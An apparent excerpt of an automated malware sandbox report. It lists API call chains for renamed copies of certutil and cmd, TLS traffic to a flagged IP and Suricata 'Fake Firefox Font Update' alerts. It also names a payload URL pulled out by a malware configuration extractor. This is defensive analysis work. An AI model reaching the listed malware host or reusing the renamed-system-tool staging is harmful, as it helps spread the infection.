    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68ACB32D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC992C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,7_2_00007FF68AC992C4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACCF2F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,7_2_00007FF68ACA92D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD07290 NCryptIsKeyHandle,#359,#360,#357,#358,7_2_00007FF68AD07290
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,7_2_00007FF68ACFD28C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,7_2_00007FF68AC9B2B4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF68ACD32A8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6D240 #357,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68AC6D240
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,7_2_00007FF68ACBB808
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68AC6F810
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,7_2_00007FF68ACFF7FC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC717D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,7_2_00007FF68AC717D4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,7_2_00007FF68ACE97E4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACEB794 CryptExportPublicKeyInfoEx,SetLastError,7_2_00007FF68ACEB794
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC4B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,7_2_00007FF68AC4B788
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,7_2_00007FF68AC6D790
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA577C #360,#358,CryptDecodeObject,GetLastError,#357,7_2_00007FF68ACA577C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD37A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,7_2_00007FF68ACFD750
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,7_2_00007FF68AC9F774
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD5768
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC438FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68AC438FC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC53918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC53918
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF68ACD391C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF68ACFF918
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB8D0 I_CryptGetLruEntryData,#357,7_2_00007FF68ACBB8D0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,7_2_00007FF68ACA18DC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,7_2_00007FF68ACA9878
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68AD098B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC67884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,7_2_00007FF68AC67884
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,7_2_00007FF68ACBD850
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF68ACC184C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD3860
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,7_2_00007FF68ACB95FC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5F630 CryptAcquireContextW,GetLastError,#357,SetLastError,7_2_00007FF68AC5F630
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC5D5C2
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC955F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,7_2_00007FF68AC955F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD3590
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD09580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,7_2_00007FF68AD09580
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFF570 CryptHashCertificate,SetLastError,7_2_00007FF68ACFF570
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,7_2_00007FF68AC9B55C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD36E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF68ACBF6D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF68ACF9688
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC876B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68AC876B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACED6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF68ACED6A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF68ACD3654
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFF650 CryptHashCertificate2,SetLastError,7_2_00007FF68ACFF650
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACCF644
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACA366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,7_2_00007FF68ACA366C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,7_2_00007FF68ACBB664
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC45664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,7_2_00007FF68AC45664
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68AC5D660
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49759 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49783 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49874 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49899 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49910 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49923 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49936 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49948 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49959 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49972 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49985 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50011 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50021 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50032 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50044 version: TLS 1.2
    Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
    Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
    Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337851402.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF71967823C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF719672978
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF719661560
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7196635B8
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF719687B4C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF71967823C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF719672978
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF719661560
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7196635B8
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF719687B4C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68AD16F80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68AD13100
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68AD110C4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68AD1234C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68ACAC6F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68ACBDBC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD119F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68AD119F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68AD11B04
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68ACB5E58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68ACBB3D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68ACBD4A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC7D440
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68ACF3674
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02AA5908

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABE4B4 InternetCheckConnectionA,11_2_02ABE4B4
    Source: Joe Sandbox ViewIP Address: 108.170.55.202 108.170.55.202
    Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49759 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49765 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49772 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49776 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49783 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49787 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49799 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49794 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49812 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49819 -> 108.170.55.202:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49806 -> 108.170.55.202:443
